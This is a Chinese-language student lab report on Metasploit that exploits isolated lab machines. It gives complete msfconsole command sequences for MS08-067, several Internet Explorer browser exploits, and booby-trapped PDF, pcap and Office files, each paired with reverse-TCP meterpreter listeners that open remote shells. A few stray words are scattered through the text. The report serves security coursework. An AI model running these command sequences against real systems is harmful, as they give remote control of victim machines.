1.模塊:
模塊是指Metasploit
框架中所使用的一段軟件代碼組件,查看六種模塊源碼目錄/usr/share/metasploit-framework/modules
共六個模塊:html
滲透攻擊模塊; 輔助模塊; 攻擊載荷; 空字段模塊; 編碼模塊; 後滲透攻擊模塊;
2.用戶操做界面:web
msfconsole armitage webgui
3.攻擊方式shell
主動攻擊:直接攻擊系統開啓的漏洞服務,獲取系統控制權 攻擊瀏覽器,獲取系統控制權 攻擊客戶端應用,獲取系統控制權 本地提權
4.使用命令windows
search name:用指定關鍵字搜索能夠利用的漏洞模塊 use exploit name:使用漏洞 show options:顯示配置選項 set option name option:設置選項 show payloads:回鏈攻擊載荷 show targets: 顯示目標(os版本) set TARGET target number:設置目標版本 exploit:開始漏洞攻擊 sessions -l:列出會話 sessions -i id:選擇會話 sessions -k id:結束會話 Ctrl+z:把會話放到後臺 Ctrl+c:結束會話 show auxiliary:顯示輔助模塊 use auxiliary name:使用輔助模塊 set option name option:設置選項 exploit:運行模塊
任務一:主動攻擊實踐
任務二:一個針對瀏覽器的攻擊
任務三:一個針對客戶端的攻擊
任務四:成功應用任何一個輔助模塊api
1.MS08_067自動化漏洞
攻擊機IP:kali 192.168.64.144
靶機:Win2000 192.168.64.166
輸入msfconsole進入控制檯,依次輸入如下指令:瀏覽器
use exploit/windows/smb/ms08_067_netapi; show payloads; set payload generic/shell_reverse_tcp ;//回連 set LHOST 192.168.64.144 set LPORT 5206 set RHOST 192.168.64.166 set target 0 exploit
1.針對瀏覽器的攻擊MS11-050
攻擊機IP:kali 192.168.64.144
靶機:Win2000 192.168.64.166
輸入msfconsole進入控制檯,依次輸入如下指令:session
use windows/browser/ms11_050_mshtml_cobjectelement; set payload windows/meterpreter/reverse_http set LHOST 192.168.64.144 set LPORT 5206 set RHOST 192.168.64.166 set URIPATH ldc20175206 exploit
攻擊失敗,靶機沒法找到該網頁,攻擊機出現錯誤字樣。框架
2.針對瀏覽器的攻擊MS10_018
攻擊機IP:kali 192.168.64.144
靶機:WinXP 192.168.64.165
輸入msfconsole進入控制檯,依次輸入如下指令:tcp
use windows/browser/ms10_018_ie_behaviors; set payload windows/meterpreter/bind_tcp set LHOST 192.168.64.144 set LPORT 5206 set RHOST 192.168.64.165 set URIPATH 20175206ldc exploit
攻擊成功!出現suceesfully字樣。工具
3.針對瀏覽器的攻擊MS06-013(惟一)
輸入命令serach browser
查看漏洞:
選取漏洞進行攻擊
攻擊機IP:kali 192.168.64.144
靶機:Win2008 192.168.64.165
輸入msfconsole進入控制檯,依次輸入如下指令:
use windows/browser/ms06_013_createtextrange; set SRVHOST 192.168.64.144 set URIPATH 66666 exploit
攻擊成功!發送代碼1-100!
攻擊機IP:kali 192.168.64.144
靶機:WinXP 192.168.64.136
Adobe:
在msfconsle中輸入命令:
use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp //tcp反向回連 set LHOST 192.168.64.144 set LPORT 5206 set FILENAME ldc20175206.pdf exploit //攻擊
咱們發現建立的PDF文件生成位置:
copy到靶機中並打開:
在攻擊機中輸入:
use exploit/multi/handler //進入監聽模塊 set payload windows/meterpreter/reverse_tcp //tcp反向鏈接 set LHOST 192.168.64.144 //攻擊機ip set LPORT 5206 //攻擊端口固定 exploit
雖然沒有打開pdf,可是已經獲得回連顯示,輸入dir便可成功得到回連!
攻擊機IP:kali 192.168.64.144
靶機:WinXP 192.168.64.136
這裏在試驗了多個漏洞以後,發現仍是針對wireshark的攻擊較爲方便,由於wireshark以前在XP中已有安裝。
wireshark pcap攻擊
輸入msfconsole進入控制檯,依次輸入如下指令:
msfconsole //進入控制檯 use exploit/windows/fileformat/wireshark_packet_dect.rb set payload windows/meterpreter/reverse_tcp set LHOST 192.168.64.144 set LPORT 5206 set FILENAME ldc20175206.pcap show options exploit
而後back回基礎界面,輸入下列命令:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.64.144 set LPORT 5206 exploit
在靶機中打開咱們傳入的pcap文件,便可獲得回顯!
雖然打開仍是沒有相應,可是咱們經過攻擊機的現象已經瞭解到攻擊成功!
再來一個office的攻擊:
攻擊機IP:kali 192.168.64.144
靶機:WinXP 192.168.64.136
和以前同樣輸入命令
use windows/fileformat/ms11_006_createsizeddibsection set payload windows/meterpreter/reverse_tcp set LHOST 192.168.64.144 set LPORT 5206 set FILENAME ldc20175206.pcap show options exploit
將生成的doc傳到靶機中,開始監控,便可獲得現象!如圖,成功獲得回顯!
實驗成功!
(1)用本身的話解釋什麼是exploit,payload,encode。
exploit:攻擊模塊,是利用靶機的系統漏洞進行攻擊的模塊。
payload:載荷模塊,是傳輸攻擊所用的代碼和數據的模塊。
encode:編碼模塊,是用來對攻擊代碼編譯更新的模塊。
(2)離實戰還缺些什麼技術或步驟?
從本次實驗中就能夠看出來,咱們進行滲透的時候,發現版本都是一些舊的,或者是被淘汰和即將被淘汰的版本(指已經不是主流使用版本),這樣實用性就變得很是的弱。並且即使是win XP系統,咱們也須要讓系統的防火牆關閉才能進行系統的攻擊。而實際攻擊狀況下,系統須要是最新的版本,防火牆也是最新的,對漏洞的種類更新應該已經齊全。其次,防火牆不是關閉的而是開啓着的,咱們的滲透攻擊沒法跨過防火牆。這麼看來,咱們距離實戰還有很長的一段路要走,最起碼以如今的程度就不要稱本身是在搞滲透了,咱們還應該繼續深刻研究每一個版本,尋找其漏洞進行分析和處理,以更好的保護咱們的系統,修復漏洞,防止有心人利用這些漏洞作非法的事情,對咱們形成巨大的損失。